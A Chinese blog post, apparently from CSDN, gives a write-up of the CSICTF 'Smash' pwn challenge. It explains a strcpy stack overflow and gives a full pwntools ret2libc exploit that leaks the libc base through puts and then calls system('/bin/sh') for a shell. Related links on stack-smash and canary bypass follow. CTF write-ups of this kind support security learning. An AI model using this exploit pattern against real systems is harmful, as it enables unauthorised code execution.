【CSICTF】Smash WriteUp

最新推荐文章于 2024-11-04 10:19:37 发布
最新推荐文章于 2024-11-04 10:19:37 发布
阅读量260 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tqydyqt/article/details/107462804
版权


作为最后一道pwn题,难度还行
附件直接给了libc文件


main函数里采用动态分配内存来储存输入,无法溢出,但是会将字符串传入say_hello函数中,strcpy函数可以溢出
没有后门函数,考虑采取ret2libc的rop方法,先泄露libc基址,然后返回main函数,再system binsh拿到shell

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='i386'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('chall.csivit.com',30046)
#io=process('./hello')
elf=ELF('./hello')
libc=ELF('./libc.so.6')

ra()
sl('a'*(0x84+4)+p32(elf.plt['puts'])+p32(0x804865D)+p32(elf.got['puts']))
rl()
puts_addr=u32(rn(4))
libc_addr=puts_addr-libc.sym['puts']
system_addr=libc_addr+libc.sym['system']
binsh=libc_addr+libc.search('/bin/sh\0').next()
ra()
sl('a'*(0x84+4)+p32(system_addr)+p32(0x804865D)+p32(binsh))

io.interactive()

古月浪子
关注
171119 Pwn-StackSmash
whklhhhh的博客
11-24 1000
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1440
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.csdn.net/qq_42192672/article...
jarvisoj pwn smashes (2015 32c3-ctf hackme) [Stack Smash]
ACdream
02-07 569
题目链接: https://www.jarvisoj.com/challenges 题目bin文件来源: github - ctfswriteup - 2015 - 32c3ctf - pwn - hackme   分析过程: 开启了NX与Canary 程序流程: 输入名字之后,即可输入一个地址去覆盖flag~这里涉及的知识点是:Stack Smash 当程序开启了Can...
防止Stack smash的技术
baron-周贺贺-代码改变世界ctw
12-08 579
Stack smash attack的示例 部署 Canary 漏洞缓解措施 ShadowCallStack PAC:Pointer authentication和BTI:Branch target instructions介绍
花式栈溢出值stack smash
weixin_45097188的博客
11-12 319
花式栈溢出值stack smash 原理: 在程序加了 canary 保护之后,如果我们读取的 buffer 覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后,如果发现 canary 被修改的话,程序就会执行 __stack_chk_fail 函数来打印 ...
关于wordpress instagram feed 插件 (现更名为Smash Balloon Social Photo Feed)
fobweb的博客
11-04 409
插件地址:Smash Balloon Social Photo Feed – Easy Social Feeds Plugin – WordPress 插件 | WordPress.org China 简体中文安装后,配置教程:Setting up the Instagram Feed Pro WordPress Plugin - Smash Balloon从这里面开始看就可以了:
好好说话之Stack smash
hollk’s blog
07-28 2085
Stack smash 我们之前一直没有做过关于canary保护的题,那么这个Stack smash就是绕过canary保护的技术。在程序加载了canary保护之后如果我们是在覆盖缓冲区的时候就会连带着覆盖了canary保护的cookie,这个时候程序就会报错。但是这个技术并不在乎是否报错,而是在乎报错的内容。stack smash技巧就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动canary保护之后,如果发现canary被修改的话就会执__stack_chk_fail函数来打印argv
【PWN · Stack Smash】[2021 鹤城杯]easyecho
Mr_Fmnwon的博客
07-30 1092
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
花式栈溢出技巧之stack smash
至臻求学,胸怀云月
03-01 1862
原理 在程序添加了canary保护后,如果我们读取的buffer覆盖了对应的值时,程序就会报错,而我们一般并不会关心报错信息。 但stack smash技巧则是利用打印这一信息的程序得到我们想要的内容。 这是因为程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。 ...
L-SMASH-Works_LSMASHSource_L-SMASH Source_R929_x86&x64;
11-10
L-SMASH-Works\LSMASHSource\L-SMASH Source R929 x86&x64;是用于avisynth的插件,目前用来读取MKV等视频的最好插件,最新的R929版本因为需要从国外站点下载导致国内不能下载,本人费了好大的劲才搞到的,在这里分享...
SMASH
10-24
**SMASH:深入理解字体技术** 在数字设计领域,字体扮演着至关重要的角色。"SMASH"可能是指一个特定的字体库、字体管理工具或与字体设计相关的项目。在这个话题中,我们将深入探讨字体的基本概念、类型以及如何有效...
ARCropolis:Super Smash Bros.Ultimate正在进行的文件替换插件
03-31
一个Skyline插件,用于用任意大小的文件替换Smash Ultimate中的任意文件。 由Raytwo和jam1garner等分制成,在Shadow的帮助下也是如此。 安装 将zip的内容从最新版本复制到SD上,以便该插件位于以下文件夹中: sd:/...
smashgg.js:适用于Smash.gg公共API的Node.JS SDK
05-17
用于公共Smash.gg API的Node.js SDK,其中包含有关平台上发生的锦标赛括号的数据。 require ( 'colors' ) ; const smashgg = require ( 'smashgg.js' ) ; const { Event } = smashgg ; smashgg . initialize ( '...
Comicbook Smash
10-24
《Comicbook Smash》是一款以漫画风格为主题的字体设计资源,它为设计师、插画师以及创意工作者提供了丰富的视觉元素,以创建具有鲜明漫画风格的设计作品。这个压缩包包含了一系列与漫画书风格相关的字体文件,旨在...
基于Java的家庭理财系统设计与开发-金融管理-家庭财产管理-实用性强
11-07
内容概要:文章探讨了互联网时代的背景下开发一个实用的家庭理财系统的重要性。文中分析了国内外家庭理财的现状及存在的问题,阐述了开发此系统的目的——对家庭财产进行一体化管理,提供统计、预测功能。系统涵盖了家庭成员管理、用户认证管理、账单管理等六大功能模块,能够满足用户多方面查询及统计需求,并保证数据的安全性与完整性。设计中运用了先进的技术栈如SSM框架(Spring、SpringMVC、Mybatis),并采用MVC设计模式确保软件结构合理高效。 适用人群:对于希望科学地管理和规划个人或家庭财务的普通民众;从事财务管理相关专业的学生;有兴趣于家政学、经济学等领域研究的专业人士。 使用场景及目标:适用于日常家庭财务管理的各个场景,帮助用户更好地了解自己的消费习惯和资金状况;为目标客户提供一套稳定可靠的解决方案,助力家庭财富增长。 其他说明:文章还包括系统设计的具体方法与技术选型的理由,以及项目实施过程中的难点讨论。对于开发者而言,不仅提供了详尽的技术指南,还强调了用户体验的重要性。
弹性盒子Flexbox布局.docx
最新发布
11-07
弹性盒子Flexbox布局.docx
网络财务系统 SSM毕业设计 附带论文.zip
11-07
网络财务系统 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
联想电脑的bios设置
11-07
联想电脑的bios设置、图文都有
1_教务处关于云南师范大学2024年大学生科研训练基金项目立项申报工作的通知 (1).zip
11-07
1_教务处关于云南师范大学2024年大学生科研训练基金项目立项申报工作的通知 (1).zip
ASML SMASH系统介绍
06-09
ASML SMASH (Single Machine Absolute Structures and Height)系统是一种用于半导体制造中的三维测量技术。它可以对晶圆上的结构进行高精度的三维扫描和测量,以帮助制造商检测和纠正制造过程中的缺陷和偏差。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值